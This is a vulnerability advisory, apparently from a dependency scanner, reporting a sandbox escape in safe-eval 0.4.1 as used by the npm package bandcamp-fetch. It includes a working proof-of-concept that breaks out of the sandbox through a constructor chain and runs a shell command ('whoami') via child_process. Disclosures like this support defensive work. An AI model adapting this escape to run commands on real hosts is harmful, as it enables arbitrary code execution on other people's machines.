bandcamp-fetch@0.1.0-a-20210216

Vulnerabilities

1 via 1 paths

Dependencies

24

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

high severity

Sandbox Escape

  • Vulnerable module: safe-eval
  • Introduced through: safe-eval@0.4.1

Detailed paths

  • Introduced through: bandcamp-fetch@0.1.0-a-20210216 safe-eval@0.4.1

Overview

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

POC by Anirudh Anand (for node 12.13.0)

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

Remediation

There is no fixed version for safe-eval.

References